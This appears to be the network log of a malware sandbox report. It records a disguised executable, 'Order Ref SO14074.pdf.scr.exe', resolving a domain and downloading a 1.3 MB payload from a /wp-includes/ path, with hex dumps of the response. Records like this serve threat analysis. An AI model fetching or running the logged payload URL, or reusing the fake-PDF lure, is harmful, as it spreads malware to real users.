                              Nov 29, 2024 09:36:57.861459017 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:57.861546040 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:57.861566067 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:57.861613035 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:57.943540096 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:57.943564892 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:57.943661928 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:57.943698883 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:57.943747997 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.017710924 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.017734051 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.017819881 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.017855883 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.017903090 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.022671938 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.022691965 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.022756100 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.022773027 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.022816896 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.028492928 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.028510094 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.028594971 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.028604984 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.028656960 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.034138918 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.034156084 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.034243107 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.034256935 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.034298897 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.039927006 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.039943933 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.040024042 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.040052891 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.040102005 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.045306921 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.045329094 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.045419931 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.045432091 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.045581102 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.053452015 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.053472042 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.053549051 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.053566933 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.053642035 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.135831118 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.135850906 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.135948896 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.135973930 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.136025906 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.209728003 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.209744930 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.209832907 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.209862947 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.209912062 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.215096951 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.215112925 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.215192080 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.215199947 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.215239048 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.220624924 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.220638990 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.220736027 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.220742941 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.220786095 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.226344109 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.226360083 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.226438046 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.226448059 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.226491928 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.231393099 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.231408119 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.231466055 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.231477022 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.231501102 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.231520891 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.236664057 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.236686945 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.236743927 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.236756086 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.236808062 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.245402098 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.245418072 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.245495081 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.245522976 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.245565891 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.328032017 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.328068018 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.328176022 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.328206062 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.328262091 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.401915073 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.401945114 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.402072906 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.402107000 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.402158022 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.407421112 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.407437086 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.407517910 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.407526970 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.407617092 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.412451029 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.412467003 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.412563086 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.412573099 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.412615061 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.418234110 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.418251991 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.418344975 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.418354988 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.418395996 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.423774958 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.423791885 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.423888922 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.423896074 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.423948050 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.429092884 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.429111004 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.429177046 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.429187059 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.429227114 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.429244995 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.437553883 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.437572002 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.437658072 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.437693119 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.437740088 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.445956945 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.520597935 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.520623922 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.520704985 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.520736933 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.520786047 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.645797968 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.645828009 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.645977020 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.646008968 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.646064043 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.883764982 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.883779049 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.883824110 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.883848906 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.883878946 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.883904934 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.883917093 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884249926 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884270906 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884305000 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884315968 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884334087 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884342909 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884349108 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884361982 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884387016 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884388924 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884416103 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884421110 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.884449959 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.884465933 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.885380030 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.885399103 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.885436058 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.885442019 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.885463953 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.885483980 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886363029 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886383057 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886425018 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886430025 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886459112 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886467934 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886481047 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886497974 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886532068 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886537075 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.886564970 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.886583090 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.887392044 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.887413025 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.887447119 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.887451887 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.887476921 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.887495995 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.888212919 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.888233900 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.888295889 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.888299942 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.888333082 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.888333082 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.889084101 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889102936 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889153957 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.889179945 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889193058 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.889219999 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.889909029 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889931917 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889966011 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.889971972 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.889995098 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.890045881 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.890538931 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.890578985 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.890604019 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.890613079 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.890623093 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.890625954 CET443497065.23.51.54192.168.2.5
                              Nov 29, 2024 09:36:58.890670061 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.891199112 CET49706443192.168.2.55.23.51.54
                              Nov 29, 2024 09:36:58.934546947 CET49706443192.168.2.55.23.51.54
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 29, 2024 09:36:53.383476019 CET5205253192.168.2.51.1.1.1
                              Nov 29, 2024 09:36:54.281348944 CET53520521.1.1.1192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 29, 2024 09:36:53.383476019 CET192.168.2.51.1.1.10xf911Standard query (0)www.new.eventawardsrussia.comA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 29, 2024 09:36:54.281348944 CET1.1.1.1192.168.2.50xf911No error (0)www.new.eventawardsrussia.com5.23.51.54A (IP address)IN (0x0001)false
                              • www.new.eventawardsrussia.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.5497065.23.51.544435988C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 08:36:55 UTC103OUTGET /wp-includes/Lbvlxeqj.vdf HTTP/1.1
                              Host: www.new.eventawardsrussia.com
                              Connection: Keep-Alive
                              2024-11-29 08:36:56 UTC220INHTTP/1.1 200 OK
                              Server: nginx/1.26.1
                              Date: Fri, 29 Nov 2024 08:36:56 GMT
                              Content-Length: 1305608
                              Connection: close
                              Last-Modified: Thu, 28 Nov 2024 22:24:11 GMT
                              ETag: "13ec08-628008aa5bffc"
                              Accept-Ranges: bytes
                              2024-11-29 08:36:56 UTC16164INData Raw: 79 d2 8c 90 b5 1c f9 01 01 b1 85 ee 07 cf 09 ac d6 f0 80 dc 42 61 bc 61 9b 38 c5 38 74 82 46 70 6d 94 c4 4b ea 73 a1 0f 4f f2 1b 2f 0a 75 25 d5 41 cb f1 e2 44 69 8f 73 ea d4 73 5f e9 b2 9f 9d 9f 23 07 69 dc d3 a1 4e bd 60 d1 d4 c6 a1 f9 66 19 56 16 e0 da c2 5f d3 72 5f 37 0a b8 1f 24 2b 03 0b 89 d3 75 b1 df 32 7c 9c 0d 92 ae 43 dc 06 5a 04 a0 b5 13 35 22 61 3e 82 b5 99 d4 d5 5a 28 94 85 f9 bd 3d cd 0e c8 8f f6 ac 91 e3 11 ed 10 fa 8c 27 41 ad 66 f8 e8 b6 61 f7 b3 cb 84 41 fc 7a 3f 6c bd 14 dc a8 6e 73 79 89 38 ac 2c 5f e7 a7 99 e9 f4 dd a1 a1 a9 a2 14 cf f3 d9 38 b2 20 99 f8 e3 2b 48 d2 1c ad 1e f2 06 4e aa 30 85 c9 7f f7 e1 7f f0 b5 7f 69 84 d2 9e 2d e2 ad 65 04 e1 36 0b e8 56 c3 ba ca f1 13 09 44 5a 30 28 fe fb af 3c 59 f0 c2 2a 71 8b 22 9b 65 43 f2 b5
                              Data Ascii: yBaa88tFpmKsO/u%ADiss_#iN`fV_r_7$+u2|CZ5"a>Z(='AfaAz?lnsy8,_8 +HN0i-e6VDZ0(<Y*q"eC
                              2024-11-29 08:36:56 UTC16384INData Raw: b0 03 3a 58 45 25 f7 a6 d3 82 6d 3c a2 dd ad 9f c2 ef a6 80 08 af 7c 78 de 91 01 af 56 20 e1 a3 23 93 68 95 67 19 54 c6 34 46 82 da bb c8 ed 6c 2b 74 5c 56 ed b8 c2 aa 10 43 a8 74 79 0a 79 2c 21 6a 36 4c e3 6c e6 94 a6 62 95 be 9a 6b fb ef 7c 12 49 da 99 e3 0f 1c 0a 63 fa 99 ab 0a ea a7 e0 9f cb c0 61 cc 6a 67 c0 87 de e7 b6 2e fa a5 5e 2c 68 0e 58 a3 72 d5 d7 59 94 c0 e7 28 7a 81 06 a0 52 8d b0 8f 8b 97 d3 01 29 40 de 3b 30 42 a3 90 d5 0e f5 d0 e3 09 d0 d9 61 b1 0b b7 59 df e5 ae 52 d6 e8 1e c5 9a 5c 08 41 65 02 6a de a5 97 ee 74 bf b0 89 9b bb 1e eb a1 10 0a bd 4c c0 a6 6b 8b 3b 51 a8 19 3e c9 27 59 6f 4a 07 91 2e 50 05 01 c7 9b 13 73 7f e5 26 ad 69 ec c9 a2 a6 6d 5d 43 cd 5d e9 ea fd 9b 51 18 5e f3 a2 e8 a4 10 25 3c 85 11 4e fb de cc 56 d1 c1 39 8c fa
                              Data Ascii: :XE%m<|xV #hgT4Fl+t\VCtyy,!j6Llbk|Icajg.^,hXrY(zR)@;0BaYR\AejtLk;Q>'YoJ.Ps&im]C]Q^%<NV9
                              2024-11-29 08:36:56 UTC16384INData Raw: 5e b4 74 7f 10 ba e2 1c 9c 91 b9 91 7a 28 96 90 cc e8 34 a0 ab 08 af ac f2 c9 cc 07 38 de d6 da f4 71 92 32 15 0d fa 67 9c f6 8e 9a 7a a7 44 f0 3c ec 35 b3 32 e1 79 ca bf ab fc 21 03 ad c5 c8 3f f3 0e 2f ed 92 eb 0d ec d6 6a 28 d8 ab e1 56 e5 c1 ac 0d e3 23 76 7c 59 6f d2 85 29 e3 85 3a 1a 2f d8 17 36 8d 6f bd c8 35 4c 97 f2 6c 3e f9 9e 58 f6 da f9 da de 98 19 7c 2d b8 60 66 9c 18 8d b4 5b 9a 48 71 a6 f0 d0 61 9d aa 8a 73 73 28 4b 5d 67 cf 5f 9f 21 0f 7a 08 24 a2 b6 b8 c0 0a 2f 07 cd 94 e7 10 02 d7 18 a6 0d c5 59 04 90 3b 87 11 ea 46 b2 85 28 54 45 04 4e 48 6a c8 16 8e 75 25 57 c1 6d 26 60 62 95 cb c6 e6 5e 70 42 57 36 2b 43 eb 5c c3 cd 2d 7f 0b 10 71 09 0f 78 4b c7 f4 d3 40 1d 34 97 0e 66 7b 99 96 89 51 d2 cc 15 94 e7 b9 a8 79 d3 ab ad dc c9 6d e6 c1 51
                              Data Ascii: ^tz(48q2gzD<52y!?/j(V#v|Yo):/6o5Ll>X|-`f[Hqass(K]g_!z$/Y;F(TENHju%Wm&`b^pBW6+C\-qxK@4f{QymQ
                              2024-11-29 08:36:56 UTC16384INData Raw: 18 01 74 95 81 d4 e6 cb 2f fa 5c 26 18 56 c0 46 c0 f5 8d 16 25 3c 93 a2 88 16 b2 75 e9 78 a8 78 e1 2a 03 c9 42 c9 85 07 98 9d 38 d1 49 c7 8d 04 02 d6 4c 25 6f 6c 23 e3 d4 a4 4e d8 c2 99 ff 4c 65 89 72 b1 8b 00 22 78 70 28 2f eb 71 5c 39 24 bc 1c 76 e9 8a bb bf 20 2f 35 7b 49 b3 45 2e 6b 81 2e 0f c2 eb ae a7 a2 ba 08 6d d8 02 e9 37 92 44 ff 88 7b 69 cb 39 f4 22 b9 6d 07 22 87 fd b6 57 f1 fd d2 b2 05 91 86 03 7c cc 19 16 f8 e0 d3 f1 60 68 d6 5e 19 95 82 e5 f4 71 5d b9 d1 43 6a f8 99 8a 4d 26 b3 8e 28 1d 19 91 98 5a e2 80 16 52 8b e1 96 63 5c 54 b2 b5 9f 69 53 60 e9 6d 3a ed a5 24 cb 20 9b bc 6f 9b a0 c9 1a f5 2b 02 14 94 1e 7a 8a 63 6f 38 d1 32 37 d7 9d 52 76 83 08 86 d0 32 05 57 33 a9 b4 43 b7 6b 49 5e 9b 91 3e 69 5b 9a 43 54 2b f6 b3 67 04 5e a4 58 c5 a3
                              Data Ascii: t/\&VF%<uxx*B8IL%ol#NLer"xp(/q\9$v /5{IE.k.m7D{i9"m"W|`h^q]CjM&(ZRc\TiS`m:$ o+zco827Rv2W3CkI^>i[CT+g^X
                              2024-11-29 08:36:56 UTC16384INData Raw: 62 f8 98 3b 7e da bb fd ba 20 e6 3f 44 3d 33 64 ca c0 58 99 ec 52 3e bb dd 85 33 29 c1 d1 97 cf 31 7a 41 76 1a 34 ff 4a 59 39 d4 80 b1 77 62 f5 bd 61 75 1f 1b 76 1d ee ee 63 07 ff df 63 6c e3 0a 85 4d e2 b3 5d 0c 01 fd 97 4d f6 19 9a 0a 26 36 06 d3 d1 de 6c c0 fa 40 93 a2 3d 40 19 dc ed 9f 96 76 b5 25 6d f1 b8 6f 46 73 d9 15 05 31 74 2e 01 84 e6 98 28 61 a5 3e a7 20 39 41 2b 83 7a 97 f9 96 59 43 21 1d aa 25 6d d0 38 6d 19 7b 10 e2 ef 72 e1 40 63 b0 5c 6b b6 15 9d b8 3b 7d 56 06 be 54 44 83 97 3c 6b cd b4 b6 b1 50 4a 24 42 ad 29 19 06 3b 6a ad a5 15 b8 d9 63 8f 42 fc bd 6a 8f 4d fc 23 84 81 4d 4b e4 b1 01 9d 6b af bf b4 8d 9b ea 15 7e 1e 9c 18 ec 24 5b 6a e1 69 4c 70 88 19 ad 38 b4 51 30 43 2d ce 04 8d a5 a3 2f a5 df 28 98 ec 07 41 7a 37 54 fb 19 fd 74 7d
                              Data Ascii: b;~ ?D=3dXR>3)1zAv4JY9wbauvcclM]M&6l@=@v%moFs1t.(a> 9A+zYC!%m8m{r@c\k;}VTD<kPJ$B);jcBjM#MKk~$[jiLp8Q0C-/(Az7Tt}
                              2024-11-29 08:36:56 UTC16384INData Raw: 89 e5 e8 ce 38 18 f0 37 4f 91 07 09 93 ba 99 5c b2 d4 a2 cb b8 4b 53 bc 6c 51 42 c3 a6 ce 63 69 63 f1 9e bd 8e 4e e0 85 ef 2c 74 03 95 6b 96 4b 76 ee 0c f6 dd 26 09 ab 22 4d 85 d6 e3 5f d9 67 ea ca 02 a9 8b 0a f6 32 4f 41 0f 82 62 a7 d8 fc 40 38 47 c4 6d 01 0f bf a9 ca 65 2f e3 25 2a 44 de ae 41 5f 6a 70 57 51 f1 46 5a 61 14 82 3a ce bd 5b d2 83 a8 1c c7 91 e6 79 20 58 fe 70 f1 9d 12 9e dc 4b 26 2a 5e cf 73 a6 a0 6d 54 8c d5 91 48 f8 ef 7c b4 1c 4e 96 19 98 8a 29 b6 3d fe 3f a8 2c a0 fb c4 57 d2 84 a6 86 b4 a4 65 8a 64 4f 52 b1 1b bf a8 7a e2 db c4 51 9f 0d ec 98 2c 94 ff 25 f2 5a 24 f7 6e d7 3c 7d a2 e4 f3 04 6a 81 86 55 55 61 79 df 19 f0 58 71 40 75 b0 a5 d0 57 0b dd 57 bb 0d eb c6 f1 75 e5 4e 0a 20 ae cb 6f 97 37 8e 87 16 a8 64 25 7d 3a e6 34 7f a1 c0
                              Data Ascii: 87O\KSlQBcicN,tkKv&"M_g2OAb@8Gme/%*DA_jpWQFZa:[y XpK&*^smTH|N)=?,WedORzQ,%Z$n<}jUUayXq@uWWuN o7d%}:4
                              2024-11-29 08:36:56 UTC16384INData Raw: ff 7e 61 73 d6 c5 1b 50 61 87 3f 91 3e 1d 9a ba 3c 41 c8 8a 51 4b 20 3a 96 3b 3c 8c e9 c8 1b 1c 13 d5 8b b9 77 0d ed 28 ca 60 1a 30 76 cc c8 6d 25 a2 28 c2 fa 56 49 5a 2f 67 03 ca 2b 24 94 fc e7 9b 71 c3 3a 89 9b d0 9f b8 ef be 36 2e 9b 3d 56 b8 ae bd 17 d9 e3 3b e7 33 5d b4 c6 c3 18 99 56 3f 68 f9 ef e2 b7 f6 d9 a4 e8 1a 58 82 97 be ef bb 19 8d cc cd a9 51 9a 91 c1 36 6b 1c 23 23 2a cd de 68 09 e4 25 e6 35 8a 5c 4a 1c df 3f 9a c9 45 a8 b0 fd 35 7c 69 d5 67 f6 18 41 fc 54 49 35 bb 3b c3 0e 22 4b c8 33 ef 50 e8 01 15 a4 3e 78 04 5b 17 61 04 ca eb e2 f2 8c ae 77 a5 e0 07 36 6d d8 23 a1 1f 69 11 ab 9d b8 64 03 b0 25 98 96 34 78 62 40 40 c5 db e9 de 53 30 f3 a8 9a 2d b4 ee 9e 87 f9 59 02 09 fa f1 81 ae 44 d1 f7 50 5d 27 74 a6 d9 b4 00 44 b9 72 6d 9d be 0c 4b
                              Data Ascii: ~asPa?><AQK :;<w(`0vm%(VIZ/g+$q:6.=V;3]V?hXQ6k##*h%5\J?E5|igATI5;"K3P>x[aw6m#id%4xb@@S0-YDP]'tDrmK
